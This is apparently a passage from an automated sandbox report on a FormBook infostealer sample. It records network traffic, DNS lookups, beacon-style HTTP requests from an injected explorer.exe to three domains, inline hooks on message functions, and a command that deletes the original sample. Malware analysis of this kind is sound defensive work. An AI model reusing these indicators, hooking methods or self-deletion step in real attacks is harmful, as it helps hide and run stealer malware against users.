                                                                                    Jun 11, 2021 12:13:57.288475990 CEST4971980192.168.2.5199.59.242.153
                                                                                    Jun 11, 2021 12:13:57.415497065 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.415965080 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.415990114 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.416002035 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.416013002 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.416026115 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.416174889 CEST4971980192.168.2.5199.59.242.153
                                                                                    Jun 11, 2021 12:13:58.092125893 CEST4971980192.168.2.5199.59.242.153
                                                                                    Jun 11, 2021 12:14:18.374717951 CEST4972080192.168.2.534.102.136.180
                                                                                    Jun 11, 2021 12:14:18.417139053 CEST804972034.102.136.180192.168.2.5
                                                                                    Jun 11, 2021 12:14:18.417279959 CEST4972080192.168.2.534.102.136.180
                                                                                    Jun 11, 2021 12:14:18.417414904 CEST4972080192.168.2.534.102.136.180
                                                                                    Jun 11, 2021 12:14:18.459662914 CEST804972034.102.136.180192.168.2.5
                                                                                    Jun 11, 2021 12:14:18.562024117 CEST804972034.102.136.180192.168.2.5
                                                                                    Jun 11, 2021 12:14:18.562061071 CEST804972034.102.136.180192.168.2.5
                                                                                    Jun 11, 2021 12:14:18.562263966 CEST4972080192.168.2.534.102.136.180
                                                                                    Jun 11, 2021 12:14:18.562402010 CEST4972080192.168.2.534.102.136.180
                                                                                    Jun 11, 2021 12:14:18.604703903 CEST804972034.102.136.180192.168.2.5
                                                                                    Jun 11, 2021 12:14:38.937189102 CEST4972280192.168.2.5170.39.76.111
                                                                                    Jun 11, 2021 12:14:39.094544888 CEST8049722170.39.76.111192.168.2.5
                                                                                    Jun 11, 2021 12:14:39.094655991 CEST4972280192.168.2.5170.39.76.111
                                                                                    Jun 11, 2021 12:14:39.094999075 CEST4972280192.168.2.5170.39.76.111
                                                                                    Jun 11, 2021 12:14:39.253957033 CEST8049722170.39.76.111192.168.2.5
                                                                                    Jun 11, 2021 12:14:39.417160988 CEST8049722170.39.76.111192.168.2.5
                                                                                    Jun 11, 2021 12:14:39.417213917 CEST8049722170.39.76.111192.168.2.5
                                                                                    Jun 11, 2021 12:14:39.417313099 CEST4972280192.168.2.5170.39.76.111
                                                                                    Jun 11, 2021 12:14:39.417368889 CEST4972280192.168.2.5170.39.76.111
                                                                                    Jun 11, 2021 12:14:39.574393034 CEST8049722170.39.76.111192.168.2.5

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jun 11, 2021 12:12:37.014842987 CEST5430253192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:37.018404007 CEST5378453192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:37.074642897 CEST6530753192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:37.078557014 CEST53537848.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:37.089776039 CEST53543028.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:37.126888037 CEST53653078.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:37.202214956 CEST6434453192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:37.252634048 CEST53643448.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:39.975965023 CEST6206053192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:40.038592100 CEST53620608.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:43.154540062 CEST6180553192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:43.208348989 CEST53618058.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:44.512192965 CEST5479553192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:44.562550068 CEST53547958.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:45.898520947 CEST4955753192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:45.948964119 CEST53495578.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:47.976841927 CEST6173353192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:48.029856920 CEST53617338.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:49.435123920 CEST6544753192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:49.485213041 CEST53654478.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:50.274744034 CEST5244153192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:50.325207949 CEST53524418.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:51.934648991 CEST6217653192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:51.984662056 CEST53621768.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:52.814543009 CEST5959653192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:52.864653111 CEST53595968.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:54.049725056 CEST6529653192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:54.101264000 CEST53652968.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:12:55.797203064 CEST6318353192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:12:55.850246906 CEST53631838.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:13:03.494420052 CEST6015153192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:13:03.554992914 CEST53601518.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:13:28.216379881 CEST5696953192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:13:28.287094116 CEST53569698.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:13:31.261404991 CEST5516153192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:13:31.329421043 CEST53551618.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:13:54.522371054 CEST5475753192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:13:54.586051941 CEST53547578.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:13:56.956886053 CEST4999253192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:13:57.103427887 CEST53499928.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:14:18.308631897 CEST6007553192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:14:18.373300076 CEST53600758.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:14:22.118520975 CEST5501653192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:14:22.179194927 CEST53550168.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:14:38.757014036 CEST6434553192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:14:38.936023951 CEST53643458.8.8.8192.168.2.5
                                                                                    Jun 11, 2021 12:14:39.369801044 CEST5712853192.168.2.58.8.8.8
                                                                                    Jun 11, 2021 12:14:39.447465897 CEST53571288.8.8.8192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Jun 11, 2021 12:13:56.956886053 CEST192.168.2.58.8.8.80x3c07Standard query (0)www.northsytyle.comA (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:18.308631897 CEST192.168.2.58.8.8.80x40abStandard query (0)www.shitarpa.netA (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:38.757014036 CEST192.168.2.58.8.8.80x6540Standard query (0)www.houseofsisson.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Jun 11, 2021 12:13:57.103427887 CEST8.8.8.8192.168.2.50x3c07No error (0)www.northsytyle.com199.59.242.153A (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:18.373300076 CEST8.8.8.8192.168.2.50x40abNo error (0)www.shitarpa.netshitarpa.netCNAME (Canonical name)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:18.373300076 CEST8.8.8.8192.168.2.50x40abNo error (0)shitarpa.net34.102.136.180A (IP address)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:38.936023951 CEST8.8.8.8192.168.2.50x6540No error (0)www.houseofsisson.comhouseofsisson.comCNAME (Canonical name)IN (0x0001)
                                                                                    Jun 11, 2021 12:14:38.936023951 CEST8.8.8.8192.168.2.50x6540No error (0)houseofsisson.com170.39.76.111A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.northsytyle.com
                                                                                    • www.shitarpa.net
                                                                                    • www.houseofsisson.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.549719199.59.242.15380C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jun 11, 2021 12:13:57.288475990 CEST5091OUTGET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1
                                                                                    Host: www.northsytyle.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jun 11, 2021 12:13:57.415965080 CEST5092INHTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Fri, 11 Jun 2021 10:13:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ==
                                                                                    Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 57 41 53 56 4e 32 46 6b 78 38 4c 7a 37 37 61 52 59 64 69 51 67 71 36 4d 44 67 47 41 73 6a 30 51 62 52 35 75 71 6e 52 71 37 56 58 46 30 50 30 52 48 69 7a 46 56 4b 50 73 4f 6b 58 38 36 64 50 4f 53 37 4c 39 46 65 71 62 52 4b 48 46 4e 63 6c 6d 37 63 38 52 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                    Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.54972034.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jun 11, 2021 12:14:18.417414904 CEST5097OUTGET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1
                                                                                    Host: www.shitarpa.net
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jun 11, 2021 12:14:18.562024117 CEST5098INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Fri, 11 Jun 2021 10:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60ba4131-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.549722170.39.76.11180C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jun 11, 2021 12:14:39.094999075 CEST5110OUTGET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1
                                                                                    Host: www.houseofsisson.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jun 11, 2021 12:14:39.417160988 CEST5114INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-Redirect-By: WordPress
                                                                                    Location: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT
                                                                                    Content-Length: 0
                                                                                    Date: Fri, 11 Jun 2021 10:14:39 GMT
                                                                                    Server: LiteSpeed


                                                                                    Code Manipulations

                                                                                    User Modules

                                                                                    Hook Summary

                                                                                    Function NameHook TypeActive in Processes
                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                    GetMessageWINLINEexplorer.exe
                                                                                    GetMessageAINLINEexplorer.exe

                                                                                    Processes

                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                    Function NameHook TypeNew Data
                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE2
                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE2
                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE2
                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE2

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Analysis Process: 2435.exe PID: 6304 Parent PID: 5732

                                                                                    General

                                                                                    Start time:12:12:43
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\2435.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:241748 bytes
                                                                                    MD5 hash:862B4C2ABAD2C07AC13D5E051C18AB86
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    Analysis Process: 2435.exe PID: 6340 Parent PID: 6304

                                                                                    General

                                                                                    Start time:12:12:44
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\2435.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:241748 bytes
                                                                                    MD5 hash:862B4C2ABAD2C07AC13D5E051C18AB86
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    Analysis Process: explorer.exe PID: 3472 Parent PID: 6340

                                                                                    General

                                                                                    Start time:12:12:49
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff693d90000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:high

                                                                                    Analysis Process: control.exe PID: 6932 Parent PID: 3472

                                                                                    General

                                                                                    Start time:12:13:09
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\control.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\control.exe
                                                                                    Imagebase:0x340000
                                                                                    File size:114688 bytes
                                                                                    MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    Analysis Process: cmd.exe PID: 3584 Parent PID: 6932

                                                                                    General

                                                                                    Start time:12:13:14
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0xeb0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: conhost.exe PID: 6292 Parent PID: 3584

                                                                                    General

                                                                                    Start time:12:13:15
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >